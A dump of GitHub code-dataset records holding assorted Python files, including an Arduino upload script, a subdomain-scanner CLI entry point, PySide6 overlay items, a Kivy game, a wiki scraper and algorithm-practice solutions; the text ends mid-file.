AccountBalanceRequest.\n\n In some cases, the caller may not want to retrieve all available balances for an AccountIdentifier. If the currencies field is populated, only balances for the specified currencies will be returned. If not populated, all available balances will be returned. # noqa: E501\n\n :param currencies: The currencies of this AccountBalanceRequest.\n :type currencies: List[Currency]\n \"\"\"\n\n self._currencies = currencies\n","repo_name":"xanimo/rosetta-api","sub_path":"server/python-flask-server-generated/swagger_server/models/account_balance_request.py","file_name":"account_balance_request.py","file_ext":"py","file_size_in_byte":6123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73131161127","text":"import sys\nfrom pathlib import Path\nfrom tempfile import gettempdir\nfrom subprocess import run, CalledProcessError\nimport click\nimport inodaqv2\n\nPATH_SRC = Path(inodaqv2.__file__).parent\nBUILD_DIR = Path(gettempdir()) / \"inodaq-v2-build\"\nCACHE_DIR = Path(gettempdir()) / \"inodaq-v2-core-cache\"\n\n\ndef compile_source(port: str, fqbn: str) -> None:\n cmd = [\n \"arduino-cli\",\n \"compile\",\n \"--verbose\",\n f\"--port={port}\",\n f\"--fqbn={fqbn}\",\n f\"--build-path={BUILD_DIR}\",\n f\"--build-cache-path={CACHE_DIR}\",\n \"ino\",\n ]\n\n try:\n run(cmd, check=True, cwd=PATH_SRC)\n except CalledProcessError as e:\n sys.exit(f\"Compilation failed with code {e.returncode}\")\n\n\ndef upload_source(port: str, fqbn: str) -> None:\n cmd = [\n \"arduino-cli\",\n \"upload\",\n \"--verbose\",\n f\"--port={port}\",\n f\"--fqbn={fqbn}\",\n f\"--input-dir={BUILD_DIR}\",\n \"ino\",\n ]\n\n try:\n run(cmd, check=True, cwd=PATH_SRC)\n except CalledProcessError as e:\n sys.exit(f\"Upload failed with code {e.returncode}\")\n\n\n@click.command()\n@click.option(\"--serial-port\", default=\"COM3\", help=\"Specify serial port\")\n@click.option(\n \"--fqbn\", default=\"arduino:avr:uno\", help=\"Specify fully qualified board name\"\n)\ndef main(serial_port: str, fqbn: str) -> None:\n compile_source(serial_port, fqbn)\n upload_source(serial_port, fqbn)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dsw7/InoDAQV2","sub_path":"inodaqv2/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17871013698","text":"from django.core.management.base import BaseCommand, CommandError\nfrom ipn.repo.message.test import test\n\nclass Command(BaseCommand):\n help = \"helps me test things\"\n def add_arguments(self, parser):\n parser.add_argument('mid', nargs='*', type=int, help='message id')\n\n def handle(self, *args, **kwargs):\n print(kwargs)\n try:\n test()\n except Exception as e:\n print(\"ERROR\")\n print(e)\n","repo_name":"lpsinger/interplanetary_network","sub_path":"ipn/management/commands/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28843580122","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Hervé Beraud'\n__email__ = 'herveberaud.pro@gmail.com'\n__version__ = '0.3.0'\n\nimport argparse\nimport sys\nimport click\nfrom discosub.commands.discover import analyze\n\n\n@click.group()\ndef main():\n \"\"\"Fast BruteForce Subdomain Discover\"\"\"\n pass\n\n\n@main.command()\n@click.argument('target')\n@click.option('--agressive', '-a', is_flag=True, help=\"Use agressive scanning mode (disabled by default)\")\ndef run(agressive, **kwargs):\n '''Run a subdomain scanner on specified TARGET'''\n analyze(kwargs['target'], agressive)\n\n\n@main.command()\ndef version():\n \"\"\"Display Discosub Version\"\"\"\n print('discosub {version}'.format(version=__version__),)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"4383/discosub","sub_path":"discosub/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5163623165","text":"# -*- coding: utf-8 -*-\n# @Time : 2022/7/20 16:10\n# @Author : Tuffy\n# @Description :\nfrom typing import Dict, Tuple, Type\n\nfrom construct import Computed, Construct, Rebuild, Struct\nfrom pydantic.fields import FieldInfo\nfrom pydantic.main import BaseModel, ModelMetaclass\n\n__all__ = (\n \"SignallingBaseModel\",\n)\n\n\nclass SignallingModelMetaclass(ModelMetaclass):\n def __new__(mcs, name: str, bases: Tuple[Type, ...], attrs: dict, **kwargs):\n cls = super().__new__(mcs, name, bases, attrs, **kwargs)\n if name != \"SignallingBaseModel\":\n\n parent_subcons_ = {}\n for parent_ in bases:\n parent_subcons_ |= getattr(parent_, \"_subcons_kwargs\", {})\n\n subcons_kwargs_ = parent_subcons_ | mcs.query_construct_field(attrs)\n\n struct_type_ = attrs.get(\"_signalling_struct\", getattr(cls, \"_signalling_struct_type\", Struct))\n setattr(cls, \"_signalling_struct\", struct_type_(**subcons_kwargs_))\n setattr(cls, \"_signalling_struct_type\", struct_type_)\n\n setattr(cls, \"_subcons_kwargs\", subcons_kwargs_)\n return cls\n\n @staticmethod\n def query_construct_field(attrs: Dict[str, FieldInfo]) -> Dict[str, Construct]:\n subcons_kwargs_ = {}\n for attr_name_, field_ in attrs.items():\n if isinstance(field_, FieldInfo) and \"signalling_struct\" in field_.extra:\n if \"struct_padding\" in field_.extra:\n subcons_kwargs_[f\"_{attr_name_}_padding\"] = field_.extra[\"struct_padding\"]\n if \"compute_rebuild\" in field_.extra:\n subcons_kwargs_[f\"_{attr_name_}\"] = Rebuild(\n field_.extra[\"signalling_struct\"], field_.extra[\"compute_rebuild\"].rebuild\n )\n subcons_kwargs_[attr_name_] = Computed(field_.extra[\"compute_rebuild\"].computed)\n else:\n subcons_kwargs_[attr_name_] = field_.extra[\"signalling_struct\"]\n return subcons_kwargs_\n\n\nclass SignallingBaseModel(BaseModel, metaclass=SignallingModelMetaclass):\n _signalling_struct: Construct = Struct\n _signalling_struct_type: Construct = Struct\n\n @classmethod\n def signalling_parse(cls, data: bytes):\n dict_ = cls._signalling_struct.parse(data)\n return cls.parse_obj(dict_)\n\n @classmethod\n def signalling_build(cls, obj: Dict) -> bytes:\n return cls._signalling_struct.build(obj)\n\n def to_signalling(self) -> bytes:\n return self._signalling_struct.build(self)\n\n def get(self, name: str, default: object = None):\n if isinstance(name, str):\n return getattr(self, name, default)\n\n def __getitem__(self, key):\n return getattr(self, key)\n\n def __contains__(self, key):\n return hasattr(self, key)\n\n def __bytes__(self) -> bytes:\n return self._signalling_struct.build(self)\n","repo_name":"tufbel/PythonTools","sub_path":"src/my_tools/pystruct_tools/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74352313766","text":"\nfrom os import set_inheritable\nfrom typing import Optional\nfrom Globals import Colors, Math\n\nfrom PySide6.QtGui import QBitmap, QColor, QFocusEvent, QImage, QKeyEvent, QPainter, QPen, QPixmap\nfrom PySide6.QtWidgets import QApplication, QGraphicsItem, QGraphicsItemGroup, QGraphicsLineItem, QGraphicsRectItem, QGraphicsSceneContextMenuEvent, QGraphicsSceneHoverEvent, QGraphicsSceneMouseEvent, QListWidgetItem, QMenu, QStyleOptionGraphicsItem, QWidget\nfrom PySide6.QtCore import QPoint, QRect, QRectF, QSize, Qt\n\nclass OverlayListWidgetItem(QListWidgetItem):\n\n def __init__(self, parent: QWidget, text):\n\n super().__init__(text)\n self.parent = parent\n\nclass OverlayPreviewGraphicsItem(QGraphicsRectItem):\n\n def __init__(self, parent: QWidget, x: int, y: int, width: int, height: int):\n\n super().__init__(x, y, width, height)\n self.setAcceptHoverEvents(True)\n self.setFlag(QGraphicsItem.ItemIsMovable, True)\n self.setFlag(QGraphicsItem.ItemIsSelectable, True)\n self.setFlag(QGraphicsRectItem.ItemSendsGeometryChanges, True)\n self.setFlag(QGraphicsRectItem.ItemSendsScenePositionChanges, True)\n self.setBrush(Qt.NoBrush)\n self.setPen(Qt.NoPen)\n\n self.parent = parent\n self.isDragging = False\n self.setDefaultImage()\n\n def source(self) -> str: \n\n return self.__source\n\n def image(self) -> QImage:\n\n return self.__image\n\n def setDefaultImage(self):\n\n self.__source = ''\n self.__image = QImage('./images/no_image.jpg')\n self.__image = self.__image.scaled(\n\n QSize(self.rect().width(), self.rect().height()), \n Qt.AspectRatioMode.IgnoreAspectRatio, \n Qt.TransformationMode.FastTransformation\n )\n\n def setSource(self, source: str):\n\n self.setImage(source)\n\n def setImage(self, source):\n\n if source == '': \n\n self.setDefaultImage()\n return \n\n self.__source = source\n self.__image = QImage(source)\n self.__image = self.__image.scaled(\n\n QSize(self.rect().width(), self.rect().height()), \n Qt.AspectRatioMode.IgnoreAspectRatio, \n Qt.TransformationMode.FastTransformation\n )\n\n def itemChange(self, change: QGraphicsItem.GraphicsItemChange, value):\n\n if change == QGraphicsItem.ItemSelectedChange:\n\n self.parent.selectItem(value, graphics=self)\n\n return super().itemChange(change, value)\n\n def hoverEnterEvent(self, event: QGraphicsSceneHoverEvent):\n \n QApplication.instance().setOverrideCursor(Qt.CursorShape.OpenHandCursor)\n super().hoverEnterEvent(event)\n\n def hoverLeaveEvent(self, event: QGraphicsSceneHoverEvent):\n \n QApplication.instance().restoreOverrideCursor()\n super().hoverLeaveEvent(event)\n\n def mousePressEvent(self, event: QGraphicsSceneMouseEvent):\n\n if event.button() is Qt.MouseButton.LeftButton:\n\n self.isDragging = True\n QApplication.instance().setOverrideCursor(Qt.CursorShape.ClosedHandCursor)\n else:\n\n self.isDragging = False\n QApplication.instance().restoreOverrideCursor()\n\n super().mousePressEvent(event)\n\n def mouseReleaseEvent(self, event: QGraphicsSceneMouseEvent):\n\n if event.button() is Qt.MouseButton.LeftButton:\n\n self.isDragging = False\n self.setPos(Math.gridSnap(self.x(), self.y(), self.parent.cellSize))\n self.parent.updateItem(graphics=self)\n\n QApplication.instance().setOverrideCursor(Qt.CursorShape.OpenHandCursor)\n super().mouseReleaseEvent(event)\n\n def setRect(self, x, y, width, height):\n\n pos = Math.gridSnap(x, y, self.parent.cellSize)\n size = Math.gridSnap(width, height, self.parent.cellSize)\n\n super().setRect(0, 0, size.x(), size.y())\n self.setPos(pos.x(), pos.y())\n self.setImage(self.source())\n \n def paint(self, painter: QPainter, option, widget):\n\n painter.drawImage(0, 0, self.image())\n if self.isSelected(): \n \n painter.setBrush(Qt.BrushStyle.NoBrush)\n painter.setPen(Qt.PenStyle.DashLine)\n painter.drawRect(self.rect().x(), self.rect().y(), self.rect().width(), self.rect().height())\n\n def mouseMoveEvent(self, event: QGraphicsSceneMouseEvent):\n\n if not self.isDragging: return \n\n goalX = event.scenePos().x() - event.lastScenePos().x() + self.scenePos().x()\n goalY = event.scenePos().y() - event.lastScenePos().y() + self.scenePos().y()\n\n self.setX(Math.clamp(goalX, 0, self.parent.screenPreviewItem.width - self.rect().width()))\n self.setY(Math.clamp(goalY, 0, self.parent.screenPreviewItem.height - self.rect().height()))\n super().mouseMoveEvent(event)\n\n def contextMenuEvent(self, event: QGraphicsSceneContextMenuEvent):\n\n contextMenu = QMenu(self.parent)\n deleteItem = contextMenu.addAction('Delete')\n renameItem = contextMenu.addAction('Rename')\n\n deleteItem.setShortcut('Delete')\n action = contextMenu.exec(event.screenPos())\n \n if action is deleteItem: self.parent.deleteItem(graphics=self)\n\n def screenClamp(self, x, y, w, h) -> QPoint:\n\n return QPoint(\n \n Math.clamp(x, 0, self.parent.screenPreviewItem.width - w), \n Math.clamp(y, 0, self.parent.screenPreviewItem.height - h)\n )\n\nclass ScreenPreviewItem(QGraphicsItemGroup):\n\n def __init__(self, width: int, height: int, cellSize: int):\n\n super().__init__()\n \n self.width = width\n self.height = height \n self.cellSize = cellSize\n screen = QGraphicsRectItem(0, 0, width, height)\n screen.setBrush(QColor(Colors.GraySelected))\n screen.setPen(QColor(Colors.GraySelected))\n \n self.addToGroup(screen)\n self.drawGrid()\n\n def drawGrid(self):\n\n # Vertical\n for i in range(1, self.width // self.cellSize):\n\n x = i * self.cellSize\n mid = self.width // self.cellSize // 2\n\n line = QGraphicsLineItem(x, 0, x, self.height) \n if i == mid: line = QGraphicsLineItem(x, -self.cellSize, x, self.height + self.cellSize) \n else: line.setOpacity(0.2)\n\n line.setPen(QColor(Colors.White))\n self.addToGroup(line)\n\n # Horizontal\n for i in range(1, self.height // self.cellSize):\n\n y = i * self.cellSize\n mid = self.height // self.cellSize // 2\n\n line = QGraphicsLineItem(0, y, self.width, y)\n if i == mid: line = QGraphicsLineItem(-self.cellSize, y, self.width + self.cellSize, y)\n else: line.setOpacity(0.2)\n\n line.setPen(QColor(Colors.White))\n self.addToGroup(line)\n\nclass OverlayFinalGraphicsItem(QGraphicsRectItem):\n\n def __init__(self, preview: OverlayPreviewGraphicsItem):\n\n self.__preview = preview \n super().__init__()\n \n def preview(self) -> OverlayPreviewGraphicsItem:\n\n return self.__preview\n\n def paint(self, painter: QPainter, option, widget):\n \n x = self.preview().x()\n y = self.preview().y()\n \n if self.preview().image() is not None: painter.drawImage(x, y, self.preview().image())","repo_name":"kdmoss/elayvate","sub_path":"Items.py","file_name":"Items.py","file_ext":"py","file_size_in_byte":7344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"873611059","text":"import os\n\n# ====================== KIVY\ntry:\n from kivy.config import Config\n # Tamanho da tela da aplicação\n Config.set('graphics', 'width', '900')\n Config.set('graphics', 'height', '400')\n\n from kivy.app import App\n from kivy import platform\n from kivy.lang import Builder\n from kivy.properties import Clock\n from kivy.core.audio import SoundLoader\n from kivy.properties import ObjectProperty\n from kivy.properties import StringProperty\n from kivy.properties import NumericProperty\n from kivy.uix.relativelayout import RelativeLayout\n from kivy.graphics.vertex_instructions import Line\n from kivy.graphics.context_instructions import Color\n from kivy.graphics.vertex_instructions import Triangle\n\n from kivy.core.window import Window\n # ATALHOS DO TECLADO NA APLICAÇÃO\n\nexcept ModuleNotFoundError:\n os.system('python -m pip install \"kivy[base]\" --pre --extra-index-url https://kivy.org/downloads/simple/')\n# ====================== END OF KIVY\n\n# IMPORT [message.py]\nfrom msg import message\n\n# IMPORT [GalaxyFunctions]\nfrom GalaxyFunctions.Movement import MovementApp\nfrom GalaxyFunctions.Movement import CoordinatesApp\nfrom GalaxyFunctions.Movement import CollisionsApp\n# ====================== END OF IMPORTs\nBuilder.load_file(\"GalaxyFunctions/Menu.kv\")\nclass PlatformCheck:\n \"\"\"\n Checagem de plataforma da aplicação.\n\n ...\n\n FUNCTIONS\n ----------\n is_desktop : boolean\n return True ('linux', 'win', 'macosx') or False\n \"\"\"\n def is_desktop(self):\n \"\"\"\n Confirmar checagem com True ou False.\n \"\"\"\n \n return True if platform in ('linux', 'win', 'macosx') else False\n\nclass MainWidget(RelativeLayout, MovementApp, CoordinatesApp, CollisionsApp, PlatformCheck):\n \"\"\"\n Classe dos widgets.\n\n ...\n\n VARIABLES\n ----------\n perspective_point_x : any\n perspective_point_y : any\n\n line : NoneType\n\n [LINHA VERTICAL]\n V_NB_LINES : quantidade de linhas\n V_LINES_SPACING : espaço entre as linhas\n\n [LINHA HORIZONTAL]\n H_NB_LINES : quantidade de linhas\n H_LINES_SPACING : espaço entre as linhas\n \"\"\"\n\n # Transform.py\n from GalaxyFunctions.Transform import transform, transform_2D, transform_perspective\n\n # Keyboard.py\n from GalaxyFunctions.Keyboard import keyboard_closed, on_keyboard_down, on_keyboard_up, on_touch_down, on_touch_up\n\n perspective_point_x = NumericProperty(0)\n perspective_point_y = NumericProperty(0)\n\n V_NB_LINES = 8\n V_LINES_SPACING = .4\n vertical_lines = []\n\n H_NB_LINES = 15\n H_LINES_SPACING = .1\n horizontal_lines = []\n\n delay = 4\n NB_TILES = 8 + 4\n tiles = []\n tiles_coordinates = []\n\n SPEED = .8\n SPEED_X = 3.0\n\n current_offset_x = 0\n current_offset_y = 0\n\n current_speed_x = 0\n current_y_loop = 0\n\n state_game_over = False\n state_game_has_started = False\n points_game = StringProperty(\"SCORE: 0\")\n\n menu_widget = ObjectProperty()\n\n SHIP_WIDTH = .09\n SHIP_HEIGHT = 0.050\n SHIP_BASE_Y = 0.04\n ship = None\n ship_coordinates = []\n\n menu_title = StringProperty(\"G A L A X Y\")\n menu_button_title = StringProperty(\"START\")\n\n sound_begin = None\n ssound_galaxy = None\n sound_gameover_impact = None\n sound_gameover_voice = None\n sound_music1 = None\n sound_restart = None\n\n def __init__(self, **kwargs):\n super(MainWidget, self).__init__(**kwargs)\n # print(f'INIT\\nW: {self.width}\\nH: {self.height}')\n self.init_audio()\n self.init_vertical_lines()\n self.init_horizontal_lines()\n\n # class CoordinatesApp\n self.init_tiles()\n # main\n self.init_ship()\n\n self.reset_game()\n\n if self.is_desktop():\n self._keyboard = Window.request_keyboard(self.keyboard_closed, self)\n self._keyboard.bind(on_key_down=self.on_keyboard_down)\n self._keyboard.bind(on_key_up=self.on_keyboard_up)\n\n Clock.schedule_interval(self.update, 1.0 / 60.0)\n self.sound_galaxy.play()\n\n def init_audio(self):\n self.sound_begin = SoundLoader.load(\"assets/audio/begin.wav\")\n self.sound_galaxy = SoundLoader.load(\"assets/audio/galaxy.wav\")\n self.sound_gameover_impact = SoundLoader.load(\"assets/audio/gameover_impact.wav\")\n self.sound_gameover_voice = SoundLoader.load(\"assets/audio/gameover_voice.wav\")\n self.sound_music1 = SoundLoader.load(\"assets/audio/music1.wav\")\n self.sound_restart = SoundLoader.load(\"assets/audio/restart.wav\")\n\n self.sound_music1.volume = 1\n self.sound_begin.volume = .25\n self.sound_galaxy.volume = .25\n self.sound_gameover_voice.volume = .25\n self.sound_restart.volume = .25\n self.sound_gameover_impact.volume = .6\n\n def init_ship(self):\n with self.canvas:\n Color(0, 0, 0)\n self.ship = Triangle()\n\n def update_ship(self):\n center_x = self.width / 2\n ship_half_width = self.SHIP_WIDTH * self.width / 2\n \n base_y = self.SHIP_BASE_Y * self.height\n ship_height = self.SHIP_HEIGHT * self.height\n\n self.ship_coordinates = [\n (center_x - ship_half_width, base_y),\n (center_x, base_y + ship_height),\n (center_x + ship_half_width, base_y)\n ]\n\n x1, y1 = self.transform(*self.ship_coordinates[0])\n \n x2, y2 = self.transform(*self.ship_coordinates[1])\n\n x3, y3 = self.transform(*self.ship_coordinates[2])\n\n self.ship.points = [\n x1, y1,\n x2, y2,\n x3, y3\n ]\n \n def init_vertical_lines(self):\n \"\"\"\n Gerar linhas na vertical.\n \"\"\"\n\n with self.canvas:\n Color(1, 1, 1)\n \n # self.line = Line(\n # points=[100, 0, 100, 100]\n # )\n\n for i in range(0, self.V_NB_LINES):\n self.vertical_lines.append(Line())\n\n def init_horizontal_lines(self):\n \"\"\"\n Gerar linhas na horizontal.\n \"\"\"\n\n with self.canvas:\n Color(1, 1, 1)\n\n for i in range(0, self.H_NB_LINES):\n self.horizontal_lines.append(Line())\n\n def update_vertical_lines(self):\n \"\"\"\n Atualizar a posição para manter as linhas verticais centralizadas.\n \"\"\"\n # self.line.points = [center_x, 0, center_x, 100]\n start_index = -int(self.V_NB_LINES/2) + 1\n\n for i in range(start_index, start_index+self.V_NB_LINES):\n line_x = self.get_line_x_from_index(i)\n\n x1, y1 = self.transform(line_x, 0)\n x2, y2 = self.transform(line_x, self.height)\n\n self.vertical_lines[i].points = [x1, y1, x2, y2]\n\n def update_horizontal_lines(self):\n \"\"\"\n Atualizar a posição para manter as linhas horizontais centralizadas.\n \"\"\"\n\n start_index = -int(self.V_NB_LINES/2) + 1\n end_index = start_index + self.V_NB_LINES - 1\n\n xmin = self.get_line_x_from_index(start_index)\n xmax = self.get_line_x_from_index(end_index)\n\n for i in range(0, self.H_NB_LINES):\n line_y = self.get_line_y_from_index(i)\n\n x1, y1 = self.transform(xmin, line_y)\n x2, y2 = self.transform(xmax, line_y)\n\n self.horizontal_lines[i].points = [x1, y1, x2, y2]\n \n def on_menu_button_pressed(self):\n \"\"\"\n Iniciar jogo.\n \"\"\"\n\n if self.state_game_over:\n self.sound_restart.play()\n\n else:\n self.sound_begin.play()\n \n # init_audio\n self.sound_music1.play()\n\n self.reset_game()\n self.state_game_has_started = True\n self.menu_widget.opacity = 0\n \n\n def reset_game(self):\n \"\"\"\n Reiniciar jogo.\n \"\"\"\n\n self.current_offset_x = 0\n self.current_offset_y = 0\n\n self.current_speed_x = 0\n self.current_y_loop = 0\n\n self.tiles_coordinates = []\n \n # main\n self.pre_fill_tiles_coordinates()\n self.generate_tiles_coordinates()\n self.state_game_over = False\n\n\nclass Galaxy(App):\n \"\"\"\n GALAXY application main class\n \"\"\"\n\n pass\n\nif __name__ == '__main__':\n try:\n os.system('cls')\n message.message()\n message.success()\n\n # ====================== KIVY\n Galaxy().run()\n\n except (AttributeError) as error:\n message.error(error)\n\n except KeyboardInterrupt:\n message.Interrupt()","repo_name":"Baku-Stark/Galaxy","sub_path":"Galaxy_Kivy/Galaxy_App.py","file_name":"Galaxy_App.py","file_ext":"py","file_size_in_byte":8698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34061461952","text":"from bs4 import BeautifulSoup\nfrom urllib.parse import urljoin\nfrom datetime import datetime\nimport requests\nimport csv\n\nbase = 'https://wiki.project1999.com/'\nnpclinks = 'step2b_cleanup.txt'\n\ndef cyclelinks(filename):\n global urList\n # include .txt when passing in filename\n fileopen = open(filename).readlines()\n urList = [listitem.rstrip() for listitem in fileopen]\n # print(urList)\n\ncyclelinks(npclinks)\n\nmaxurlnum = len(urList)\nprint(maxurlnum)\n\nuindex = 0\ndef getstats():\n global uindex\n while uindex <= maxurlnum:\n scrapeurl = urList[uindex]\n #index of a list, in a file.\n req = requests.get(scrapeurl)\n soup = BeautifulSoup(req.content, 'html.parser')\n\n # # Get Wiki Entry Title [of the mob...] && print it\n wikititle = soup.title.string.replace(' - Project 1999 Wiki', '')\n print(wikititle)\n\n happtable = soup.find(\"table\", attrs={\"class\": \"mobStatsBox\"})\n happtable_data = happtable.findAll(\"tr\")\n # open a CSV file with append, so old data will not be erased\n\n statrow = []\n for mobStats in happtable_data: \n res = mobStats.find('td') \n if res: \n mobInfo = res.text.strip()\n statrow.append(mobInfo)\n \n with open('step3.csv', 'a+') as statsfile:\n csvstats = csv.writer(statsfile)\n csvstats.writerow([wikititle, statrow, scrapeurl])\n\n if uindex == maxurlnum:\n break\n elif maxurlnum + 1 == True:\n break\n else:\n uindex += 1\n\n\n #print(uindex)\n getstats()\n \ngetstats()","repo_name":"calvinmorett/mobinfo","sub_path":"step3_mobstats.py","file_name":"step3_mobstats.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15921089126","text":"'''\nCreated on Jul 8, 2014\n\n@author: user\n'''\n\nimport wx\nimport wx.richtext\nfrom lxml import etree\nimport wx.dataview as dv\n\n\nclass TreePanelView(wx.Panel):\n '''\n shows tree control in this panel\n '''\n def __init__(self, parent):\n '''\n Constructor\n '''\n wx.Panel.__init__(self, parent = parent)\n sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetBackgroundColour('#ffffff')\n self.SetSizerAndFit(sizer)\n \n def updateTree(self, root):\n self.dvtc = dvtc = dv.DataViewTreeCtrl(self)\n\n isz = (16,16)\n il = wx.ImageList(*isz)\n fldridx = il.AddIcon(wx.ArtProvider.GetIcon(wx.ART_FOLDER, wx.ART_OTHER, isz))\n fldropenidx = il.AddIcon(wx.ArtProvider.GetIcon(wx.ART_FOLDER_OPEN, wx.ART_OTHER, isz))\n fileidx = il.AddIcon(wx.ArtProvider.GetIcon(wx.ART_NORMAL_FILE, wx.ART_OTHER, isz))\n dvtc.SetImageList(il)\n\n self.root = dvtc.AppendContainer(dv.NullDataViewItem,\n \"The Root Item\",\n fldridx, fldropenidx)\n for x in range(15):\n child = dvtc.AppendContainer(self.root, \"Item %d\" % x,\n fldridx, fldropenidx)\n\n for y in range(5):\n last = dvtc.AppendContainer(\n child, \"item %d-%s\" % (x, chr(ord(\"a\")+y)),\n fldridx, fldropenidx)\n\n for z in range(5):\n item = dvtc.AppendItem(\n last, \"item %d-%s-%d\" % (x, chr(ord(\"a\")+y), z),\n fileidx)\n\n # Set the layout so the treectrl fills the panel\n bsizer = wx.BoxSizer()\n bsizer.Add(self.dvtc, 1, wx.EXPAND)\n self.SetSizerAndFit(bsizer)\n \n \nclass EditPanelView(wx.Panel):\n '''\n shows tree control in this panel\n '''\n def __init__(self, parent):\n '''\n Constructor\n '''\n wx.Panel.__init__(self, parent = parent)\n sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetBackgroundColour('#D3D3D3')\n self.SetSizerAndFit(sizer)\n \n def updateEditor(self, root):\n \n self.SetBackgroundColour(\"white\")\n \n xmltr = etree.tostring(root, encoding='utf8', method='xml')\n \n \n self.rich = wx.richtext.RichTextCtrl( self, size = wx.DisplaySize(), style = wx.WANTS_CHARS | wx.richtext.RE_MULTILINE )\n \n bsizer = wx.BoxSizer()\n bsizer.Add(self.rich, 1, wx.EXPAND)\n self.SetSizerAndFit(bsizer)\n \n self.rich.WriteText(xmltr)\n self.rich.Newline()\n self.rich.EndLeftIndent()","repo_name":"nagdev/xmleditor","sub_path":"0.01/PanelViews.py","file_name":"PanelViews.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34715177682","text":"import numpy as np\n\ndef checkREF(matrix, with_pivots=False):\n pivots = []\n currentOne = 0\n for row, i in enumerate(matrix):\n oneFound = False\n for col, j in enumerate(i):\n\n if j == 0:\n continue\n\n if not oneFound and j != 1:\n return False, pivots if with_pivots else False\n \n if currentOne <= col:\n pivots.append((row, col))\n currentOne = col\n oneFound = True\n break\n else:\n return False, pivots if with_pivots else False\n\n else:\n if not oneFound:\n currentOne = j\n\n return True, pivots if with_pivots else True\n\ndef checkRREF(matrix):\n ok, pivots = checkREF(matrix, True)\n if ok:\n for row, col in pivots:\n if sum(matrix[:, col]) != 1:\n return False\n return True\n return False\n\n","repo_name":"MrRhuezzler/Programs","sub_path":"Sem_5/SCL/PS1/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14827265136","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\ndef missingNumbers(arr, brr):\n dict={}\n ans=[]\n\n for i in arr:\n if i in dict:\n dict[i]+=1\n else:\n dict[i]=1\n\n for i in brr:\n if i in dict:\n dict[i]-=1\n else:\n dict[i]=1\n\n for i in sorted(dict):\n if(dict[i]==0):\n continue\n else:\n ans.append(i)\n\n return ans\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n m = int(input())\n\n brr = list(map(int, input().rstrip().split()))\n\n result = missingNumbers(arr, brr)\n\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"Akshaya-Rajesh/HackerRank-Algorithms","sub_path":"Missing Numbers.py","file_name":"Missing Numbers.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13751426647","text":"import importlib\nfrom oslo_log import log\n\n\nLOG = log.getLogger('nova.scheduler.filter')\n\n\ndef import_driver(driver_class, driver_path):\n\n LOG.debug(\"importing module from path %s\" % driver_path)\n driver_object = None\n imported_driver_module = importlib.import_module(driver_path)\n try:\n driver_object = getattr(imported_driver_module, driver_class)\n except Exception:\n LOG.warning('Could not load class {} from module {}'.format(driver_class,\n driver_path))\n return driver_object\n\n\ndef parse_nova_hostname(nova_node_name, use_nova_as_is_nodename):\n\n parsed_nova_hostname = nova_node_name\n\n if not use_nova_as_is_nodename:\n parsed_nova_hostname = nova_node_name.split(\".\")[0]\n\n return parsed_nova_hostname\n\n\ndef metric_passes(metric_value, metric_opts_dict):\n operator = metric_opts_dict[\"comparison_operator\"]\n threshold = float(metric_opts_dict[\"threshold\"])\n float_metric_value = float(metric_value)\n if operator == \"greater_than\":\n result = float_metric_value > threshold\n elif operator == \"less_than\":\n result = float_metric_value < threshold\n elif operator == \"equals\":\n result = float_metric_value == threshold\n else:\n raise NotImplementedError\n return result\n\n","repo_name":"teoyaomiqui/nova-ram-filter","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35452205295","text":"\n# https://leetcode-cn.com/problems/k-th-smallest-in-lexicographical-order/\n\nclass Solution:\n # 超时\n def findKthNumberI(self, n: int, k: int) -> int:\n tmp = []\n for i in range(1, n+1):\n tmp.append(str(i))\n\n return int(sorted(tmp)[k-1])\n\n def findKthNumber(self, n: int, k: int) -> int:\n cur = 1\n prefix = 1\n\n while cur < k :\n print(prefix, n)\n cnt = self.get_count(prefix, n)\n print(cnt,cur)\n if cur + cnt > k:\n prefix *= 10\n cur += 1\n else:\n prefix += 1\n cur += cnt\n # print(cnt, prefix)\n\n return prefix\n\n def get_count(self, i, n):\n if i <= n:\n cnt = 1\n else:\n return 0\n a = i\n b = i + 1\n while True:\n a = a * 10\n b = b * 10\n if n >= b:\n cnt += b - a\n elif n >= a:\n cnt += n - a + 1\n else:\n break\n return cnt\n\n\ns = 